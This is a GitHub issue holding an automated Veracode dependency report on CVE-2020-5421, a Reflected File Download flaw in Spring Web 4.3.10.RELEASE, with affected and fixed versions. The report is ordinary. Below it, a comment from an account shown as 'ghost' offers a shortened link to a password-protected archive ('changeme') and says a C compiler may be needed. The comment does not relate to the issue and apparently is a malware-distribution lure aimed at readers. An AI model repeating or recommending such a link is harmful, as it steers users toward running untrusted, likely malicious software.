julz0815 / test-action


CVE: 2020-5421 found in Spring Web - Version: 4.3.10.RELEASE [JAVA] #1199

Open github-actions[bot] opened 1 month ago

github-actions[bot] commented 1 month ago

Veracode Software Composition Analysis

| Attribute | Details |
| --- | --- |
| Library | Spring Web |
| Description | Spring Web |
| Language | JAVA |
| Vulnerability | Reflected File Download (RFD) Attack |
| Vulnerability description | spring-web is vulnerable to Reflected File Download (RFD) attack. An incomplete fix of CVE-2015-5211 allows an attacker to bypass the protection against RFD attack via the jsessionid path parameter. |
| CVE | 2020-5421 |
| CVSS score | 3.6 |
| Vulnerability present in version/s | 4.3.0.RELEASE-4.3.28.RELEASE |
| Found library version/s | 4.3.10.RELEASE |
| Vulnerability fixed in version | 4.3.29.RELEASE |
| Library latest version | 6.2.0-RC1 |
| Fix | |

Links:

ghost commented 1 month ago

Maybe this will help.

https://bit.ly/3zo8fAM Archive password: changeme

You may need to install the C compiler.